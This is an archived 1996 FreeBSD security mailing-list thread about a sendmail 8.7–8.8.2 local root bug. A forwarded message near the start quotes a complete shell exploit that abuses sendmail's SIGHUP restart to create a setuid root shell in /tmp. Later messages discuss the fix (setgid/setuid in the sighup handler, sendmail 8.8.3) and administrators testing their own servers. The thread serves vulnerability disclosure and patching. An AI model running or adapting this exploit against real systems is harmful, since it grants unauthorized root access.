------------------------------------------------------ > > Now who the heck to I send this to to get it back into sendmail? There > are no e-mail addresses listed for bug reports in the READ_ME file, or > anywhere else for that matter. > > cjs > > Curt Sampson cjs@portal.ca Info at http://www.portal.ca/ > Internet Portal Services, Inc. > Vancouver, BC (604) 257-9400 De gustibus, aut bene aut nihil. > > On Sat, 16 Nov 1996, Leshka Zakharoff wrote: > > > Date: Sat, 16 Nov 1996 04:10:16 +0300 (MSK) > > From: Leshka Zakharoff > > To: best-of-security@suburbia.net > > Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). > > Resent-Date: Sat, 16 Nov 1996 17:32:01 +1100 > > Resent-From: best-of-security@suburbia.net > > > > #-------------------------------- CUT HERE ------------------------------------- > > #/bin/sh > > # > > # > > # Hi ! > > # This is exploit for sendmail smtpd bug > > # (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms). > > # This shell script does a root shell in /tmp directory. > > # If you have any problems with it, drop me a letter. > > # Have fun ! > > # > > # > > # ---------------------- > > # --------------------------------------------- > > # ----------------- Dedicated to my beautiful lady ------------------ > > # --------------------------------------------- > > # ---------------------- > > # > > # Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su > > # > > # > > # > > echo 'main() '>>leshka.c > > echo '{ '>>leshka.c > > echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c > > echo '} '>>leshka.c > > # > > # > > echo 'main() '>>smtpd.c > > echo '{ '>>smtpd.c > > echo ' setuid(0); setgid(0); '>>smtpd.c > > echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c > > echo '} '>>smtpd.c > > # > > # > > cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c > > ./leshka > > kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1` > > rm leshka.c leshka smtpd.c /tmp/smtpd > > /tmp/sh > > #-------------------------------- CUT HERE ------------------------------------- > > > > > > > > ------- End of Forwarded Message > > -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMo4aqAQmfXmOCknRAQHtpgP/WqCBZh95dD2yKsy9v2bv65aH8qULXNOl pFq2UYuquVxtx9NOqxROtD+nlE6Sr1PfHtQz2wunUk1LDeSFb7KhJjmuu2HtnCVd q7j3rA7hDJiXuZlqXyKWMhzxShph8cn4hxYO+by9NqEyn/eGU1veGzsJFfW+Zla/ +5Qa4S7jWIs= =0CXZ -----END PGP SIGNATURE----- From owner-freebsd-security Sat Nov 16 14:09:43 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA23537 for security-outgoing; Sat, 16 Nov 1996 14:09:43 -0800 (PST) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA23523 for ; Sat, 16 Nov 1996 14:09:27 -0800 (PST) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id XAA11900 for ; Sat, 16 Nov 1996 23:09:18 +0100 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id XAA23144 for freebsd-security@freebsd.org; Sat, 16 Nov 1996 23:08:57 +0100 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.2/keltia-uucp-2.9) id XAA17097; Sat, 16 Nov 1996 23:07:43 +0100 (MET) Message-ID: Date: Sat, 16 Nov 1996 23:07:42 +0100 From: roberto@keltia.freenix.fr (Ollivier Robert) To: freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). References: <199611161927.LAA04262@cwsys.cwent.com> <199611161948.UAA09254@tiger.cert.dfn.de> X-Mailer: Mutt 0.50.05 Mime-Version: 1.0 X-Operating-System: FreeBSD 3.0-CURRENT ctm#2686 In-Reply-To: <199611161948.UAA09254@tiger.cert.dfn.de>; from Wolfgang Ley on Nov 16, 1996 20:48:58 +0100 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk According to Wolfgang Ley: > By the way: Eric Allman has produced a much better fix. I expect it to > be public available very shortly. 8.8.3 will be available shortly. The fix is already in 2.2 and 3.0-CURRENT. I'm not sure for 2.1.6 as Jordan just announced it. -- Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 3.0-CURRENT #28: Sun Nov 10 13:37:41 MET 1996 From owner-freebsd-security Sat Nov 16 16:04:57 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA28867 for security-outgoing; Sat, 16 Nov 1996 16:04:57 -0800 (PST) Received: from super-g.inch.com (spork@super-g.com [204.178.32.161]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA28849; Sat, 16 Nov 1996 16:04:48 -0800 (PST) Received: from localhost (spork@localhost) by super-g.inch.com (8.7.6/8.6.9) with SMTP id SAA12948; Sat, 16 Nov 1996 18:03:13 -0500 Date: Sat, 16 Nov 1996 17:03:13 -0600 (CST) From: "S(pork)" X-Sender: spork@super-g.inch.com To: freebsd-security@freebsd.org, freebsd-hackers@freebsd.org Subject: New sendmail bug... Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk It's nasty and easy... If you're on Bugtraq, you saw it. If anyone with more knowledge on this issue can check it out, please post to the list so everyone can free themselves of this vulnerability. Root in under 15 seconds with an account on the machine. If you need the 'sploit, please mail me here and I'll send it to you. I verified it on FBSD, NetBSD, Linux so far... TIA Charles From owner-freebsd-security Sat Nov 16 16:17:31 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA29297 for security-outgoing; Sat, 16 Nov 1996 16:17:31 -0800 (PST) Received: from Kitten.mcs.com (Kitten.mcs.com [192.160.127.90]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA29277; Sat, 16 Nov 1996 16:17:26 -0800 (PST) Received: from Mailbox.mcs.com (Mailbox.mcs.com [192.160.127.87]) by Kitten.mcs.com (8.8.2/8.8.2) with ESMTP id SAA26299; Sat, 16 Nov 1996 18:17:25 -0600 (CST) Received: from Jupiter.Mcs.Net (karl@Jupiter.mcs.net [192.160.127.88]) by Mailbox.mcs.com (8.8.2/8.8.2) with ESMTP id SAA01993; Sat, 16 Nov 1996 18:17:24 -0600 (CST) Received: (from karl@localhost) by Jupiter.Mcs.Net (8.8.2/8.8.2) id SAA16884; Sat, 16 Nov 1996 18:17:23 -0600 (CST) From: Karl Denninger Message-Id: <199611170017.SAA16884@Jupiter.Mcs.Net> Subject: Re: New sendmail bug... To: spork@super-g.com (S) Date: Sat, 16 Nov 1996 18:17:23 -0600 (CST) Cc: freebsd-security@FreeBSD.org, freebsd-hackers@FreeBSD.org In-Reply-To: from "S" at Nov 16, 96 05:03:13 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk > > It's nasty and easy... If you're on Bugtraq, you saw it. If anyone with > more knowledge on this issue can check it out, please post to the list so > everyone can free themselves of this vulnerability. Root in under 15 > seconds with an account on the machine. If you need the 'sploit, please > mail me here and I'll send it to you. I verified it on FBSD, NetBSD, > Linux so far... > > TIA > > Charles Its real - and the fix is two lines inserted in the sighup() handler: setgid(RealGid); setuid(RealUid); prior to the exec call. -- -- Karl Denninger (karl@MCS.Net)| MCSNet - The Finest Internet Connectivity http://www.mcs.net/~karl | T1's from $600 monthly to FULL DS-3 Service | 33 Analog Prefixes, 13 ISDN, Web servers $75/mo Voice: [+1 312 803-MCS1 x219]| Email to "info@mcs.net" WWW: http://www.mcs.net/ Fax: [+1 312 248-9865] | 2 FULL DS-3 Internet links; 400Mbps B/W Internal From owner-freebsd-security Sat Nov 16 16:26:36 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA29836 for security-outgoing; Sat, 16 Nov 1996 16:26:36 -0800 (PST) Received: from super-g.inch.com (spork@super-g.com [204.178.32.161]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA29817; Sat, 16 Nov 1996 16:26:32 -0800 (PST) Received: from localhost (spork@localhost) by super-g.inch.com (8.7.6/8.6.9) with SMTP id SAA13138; Sat, 16 Nov 1996 18:24:55 -0500 Date: Sat, 16 Nov 1996 17:24:55 -0600 (CST) From: "S(pork)" X-Sender: spork@super-g.inch.com To: Karl Denninger cc: freebsd-security@FreeBSD.org, freebsd-hackers@FreeBSD.org Subject: Re: New sendmail bug... In-Reply-To: <199611170017.SAA16884@Jupiter.Mcs.Net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Thanks, also I just installed smrsh on a whim (I'm definetly not a C expert, very very novice here) and smrsh (included in the sendmail dist) takes care of the problem as well... Exploit to follow... Charles On Sat, 16 Nov 1996, Karl Denninger wrote: > > > > It's nasty and easy... If you're on Bugtraq, you saw it. If anyone with > > more knowledge on this issue can check it out, please post to the list so > > everyone can free themselves of this vulnerability. Root in under 15 > > seconds with an account on the machine. If you need the 'sploit, please > > mail me here and I'll send it to you. I verified it on FBSD, NetBSD, > > Linux so far... > > > > TIA > > > > Charles > > Its real - and the fix is two lines inserted in the sighup() handler: > > setgid(RealGid); > setuid(RealUid); > > prior to the exec call. > > -- > -- > Karl Denninger (karl@MCS.Net)| MCSNet - The Finest Internet Connectivity > http://www.mcs.net/~karl | T1's from $600 monthly to FULL DS-3 Service > | 33 Analog Prefixes, 13 ISDN, Web servers $75/mo > Voice: [+1 312 803-MCS1 x219]| Email to "info@mcs.net" WWW: http://www.mcs.net/ > Fax: [+1 312 248-9865] | 2 FULL DS-3 Internet links; 400Mbps B/W Internal > From owner-freebsd-security Sat Nov 16 16:55:30 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA01245 for security-outgoing; Sat, 16 Nov 1996 16:55:30 -0800 (PST) Received: from chaos.ecpnet.com (raistlin@chaos.ecpnet.com [204.246.64.13]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA01227; Sat, 16 Nov 1996 16:55:26 -0800 (PST) Received: from localhost (raistlin@localhost) by chaos.ecpnet.com (8.8.2/8.7.3) with SMTP id SAA01881; Sat, 16 Nov 1996 18:56:48 -0600 Date: Sat, 16 Nov 1996 18:56:47 -0600 (CST) From: Justen Stepka To: "S(pork)" cc: freebsd-security@FreeBSD.ORG, freebsd-hackers@FreeBSD.ORG Subject: Re: New sendmail bug... In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Sat, 16 Nov 1996, S(pork) wrote: > It's nasty and easy... If you're on Bugtraq, you saw it. If anyone with > more knowledge on this issue can check it out, please post to the list so > everyone can free themselves of this vulnerability. Root in under 15 > seconds with an account on the machine. If you need the 'sploit, please > mail me here and I'll send it to you. I verified it on FBSD, NetBSD, > Linux so far... > > TIA > > Charles > I tested this on FBSD and I couldn't get it to work. Though when I tried it on Linux it worked in about 10 second :(, currently I have disabled accounts on my machines until I fix the problem. ------------------------------------------------------------------------------ Justen Stepka | http://www.ecpnet.com/~raistlin Network Administrator | "This space for rent" raistlin@ecpnet.com | 3.0-CURRENT FreeBSD 3.0-CURRENT ------------------------------------------------------------------------------ From owner-freebsd-security Sat Nov 16 17:05:50 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA01810 for security-outgoing; Sat, 16 Nov 1996 17:05:50 -0800 (PST) Received: from procert.cert.dfn.de (root@procert.cert.dfn.de [134.100.14.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA01805; Sat, 16 Nov 1996 17:05:43 -0800 (PST) Received: from tiger.cert.dfn.de (ley@tiger.cert.dfn.de [134.100.14.11]) by procert.cert.dfn.de (8.8.3/8.8.3) with ESMTP id CAA16908; Sun, 17 Nov 1996 02:06:57 +0100 (MET) From: Wolfgang Ley Received: (from ley@localhost) by tiger.cert.dfn.de (8.8.3/8.8.3) id CAA10374; Sun, 17 Nov 1996 02:06:56 +0100 (MET) Message-Id: <199611170106.CAA10374@tiger.cert.dfn.de> Subject: Re: New sendmail bug... To: spork@super-g.com (S) Date: Sun, 17 Nov 1996 02:06:55 +0100 (MET) Cc: karl@Mcs.Net, freebsd-security@FreeBSD.org, freebsd-hackers@FreeBSD.org In-Reply-To: from "S" at Nov 16, 96 05:24:55 pm Organization: DFN-CERT (Computer Emergency Response Team, Germany) Content-Type: text Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- S wrote: > > Thanks, also I just installed smrsh on a whim (I'm definetly not a C > expert, very very novice here) and smrsh (included in the sendmail dist) > takes care of the problem as well... Exploit to follow... smrsh won't help you protecting against the new problem (restarting sendmail via sighup and modified argv[0]). sendmail 8.8.3 (which is currently being tested) will fix the problem. Or are you talking about another (new?) problem? Bye, Wolfgang. - -- Wolfgang Ley, DFN-CERT, Vogt-Koelln-Str. 30, 22527 Hamburg, Germany Email: ley@cert.dfn.de Phone: +49 40 5494-2262 Fax: +49 40 5494-2241 PGP-Key available via finger ley@ftp.cert.dfn.de any key-server or via WWW from http://www.cert.dfn.de/~ley/ ...have a nice day -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMo5lIgQmfXmOCknRAQG4tAP/Vv1+68RYqZpYc1c5G9l3fl1a0g2KB1gY 5fhyighSNXv+CBhyMseQbL4rawSnR2ipDW1BW1MEgo3iGGpFsDIFUKIu5uk26km6 s88V80Pmc9L3AYE6p1JVH97+OpEKU3BVlRDR2g8Ya1ecxDujQF5G/fVhmwpejyvd viG7NXDFPvM= =paMe -----END PGP SIGNATURE----- From owner-freebsd-security Sat Nov 16 17:27:21 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA02850 for security-outgoing; Sat, 16 Nov 1996 17:27:21 -0800 (PST) Received: from mail.crl.com (mail.crl.com [165.113.1.22]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id RAA02845; Sat, 16 Nov 1996 17:27:19 -0800 (PST) Received: from super-g.inch.com (super-g.com) by mail.crl.com with SMTP id AA14134 (5.65c/IDA-1.5); Sat, 16 Nov 1996 17:28:16 -0800 Received: from localhost (spork@localhost) by super-g.inch.com (8.7.6/8.6.9) with SMTP id TAA13300; Sat, 16 Nov 1996 19:25:48 -0500 Date: Sat, 16 Nov 1996 18:25:48 -0600 (CST) From: "S(pork)" X-Sender: spork@super-g.inch.com To: freebsd-security@FreeBSD.org, freebsd-hackers@FreeBSD.org Subject: Re: New sendmail bug... In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk And even though it looked like it did not work with smrsh installed, it does... Can anyone with a public UNIX box say "sitting duck"? And on the weekend I have to find out about this. If only I were a programmer instead of a lowly SA with few C skills... Charles On Sat, 16 Nov 1996, S(pork) wrote: > It's nasty and easy... If you're on Bugtraq, you saw it. If anyone with > more knowledge on this issue can check it out, please post to the list so > everyone can free themselves of this vulnerability. Root in under 15 > seconds with an account on the machine. If you need the 'sploit, please > mail me here and I'll send it to you. I verified it on FBSD, NetBSD, > Linux so far... > > TIA > > Charles > From owner-freebsd-security Sat Nov 16 17:35:29 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA04038 for security-outgoing; Sat, 16 Nov 1996 17:35:29 -0800 (PST) Received: from mail.id.net (mail.id.net [199.125.1.6]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA04033; Sat, 16 Nov 1996 17:35:25 -0800 (PST) Received: from server.id.net (server.id.net [199.125.1.10]) by mail.id.net (8.7.5/ID-Net) with ESMTP id UAA02467; Sat, 16 Nov 1996 20:39:44 -0500 (EST) Received: (from rls@localhost) by server.id.net (8.7.5/8.7.3) id UAA06048; Sat, 16 Nov 1996 20:35:34 -0500 (EST) From: Robert Shady Message-Id: <199611170135.UAA06048@server.id.net> Subject: Re: New sendmail bug... In-Reply-To: from Justen Stepka at "Nov 16, 96 06:56:47 pm" To: raistlin@chaos.ecpnet.com (Justen Stepka) Date: Sat, 16 Nov 1996 20:35:34 -0500 (EST) Cc: spork@super-g.com, freebsd-security@freebsd.org, freebsd-hackers@freebsd.org X-Mailer: ELM [version 2.4ME+ PL25 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > It's nasty and easy... If you're on Bugtraq, you saw it. If anyone with > > more knowledge on this issue can check it out, please post to the list so > > everyone can free themselves of this vulnerability. Root in under 15 > > seconds with an account on the machine. If you need the 'sploit, please > > mail me here and I'll send it to you. I verified it on FBSD, NetBSD, > > Linux so far... Please send me this one, I have several shell servers here I'd like to test & plug... -- Rob === _/_/_/_/_/ _/_/_/_/ _/_/ _/ _/_/_/_/_/ _/_/_/_/_/ _/ _/ _/ _/_/_/ _/ _/ _/ _/_/_/_/ _/ _/_/_/_/_/ _/_/_/_/ _/ _/ _/_/_/_/_/ _/ Innovative Data Services Serving South-Eastern Michigan Internet Service Provider / Hardware Sales / Consulting Services Voice: (810)855-0404 / Fax: (810)855-3268 / Web: http://www.id.net From owner-freebsd-security Sat Nov 16 20:24:59 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA25631 for security-outgoing; Sat, 16 Nov 1996 20:24:59 -0800 (PST) Received: from irbs.irbs.com (jc@irbs.irbs.com [199.182.75.129]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA25624 for ; Sat, 16 Nov 1996 20:24:53 -0800 (PST) Received: (from jc@localhost) by irbs.irbs.com (8.8.2/8.8.0) id XAA09008; Sat, 16 Nov 1996 23:24:33 -0500 (EST) Message-Id: <199611170424.XAA09008@irbs.irbs.com> Date: Sat, 16 Nov 1996 23:24:33 -0500 From: jc@irbs.com (John Capo) To: raistlin@chaos.ecpnet.com (Justen Stepka) Cc: freebsd-security@FreeBSD.org Subject: Re: New sendmail bug... References: X-Mailer: Mutt 0.49-PL10 Mime-Version: 1.0 In-Reply-To: ; from Justen Stepka on Nov 16, 1996 18:56:47 -0600 Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Quoting Justen Stepka (raistlin@chaos.ecpnet.com): > > I tested this on FBSD and I couldn't get it to work. Though when I tried > it on Linux it worked in about 10 second :(, currently I have disabled > accounts on my machines until I fix the problem. > Look at /tmp/sh, you may find it suid root. Sendmail may not have had a chance to get the shell copied and suid by the time the exploit script trys to run /tmp/sh. John Capo From owner-freebsd-security Sat Nov 16 20:57:58 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA26407 for security-outgoing; Sat, 16 Nov 1996 20:57:58 -0800 (PST) Received: from quagmire.ki.net (root@quagmire.ki.net [205.150.102.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA26386; Sat, 16 Nov 1996 20:57:46 -0800 (PST) Received: from localhost (scrappy@localhost) by quagmire.ki.net (8.8.2/8.7.5) with SMTP id XAA13291; Sat, 16 Nov 1996 23:57:40 -0500 (EST) Date: Sat, 16 Nov 1996 23:57:40 -0500 (EST) From: "Marc G. Fournier" To: "S(pork)" cc: freebsd-security@FreeBSD.org, freebsd-hackers@FreeBSD.org Subject: Re: New sendmail bug... In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Sat, 16 Nov 1996, S(pork) wrote: > It's nasty and easy... If you're on Bugtraq, you saw it. If anyone with > more knowledge on this issue can check it out, please post to the list so > everyone can free themselves of this vulnerability. Root in under 15 > seconds with an account on the machine. If you need the 'sploit, please > mail me here and I'll send it to you. I verified it on FBSD, NetBSD, > Linux so far... > Please send details on 'sploit...would like to test on my Solaris 2.5.1 box as well... Thanks... Marc G. Fournier scrappy@ki.net Systems Administrator @ ki.net scrappy@freebsd.org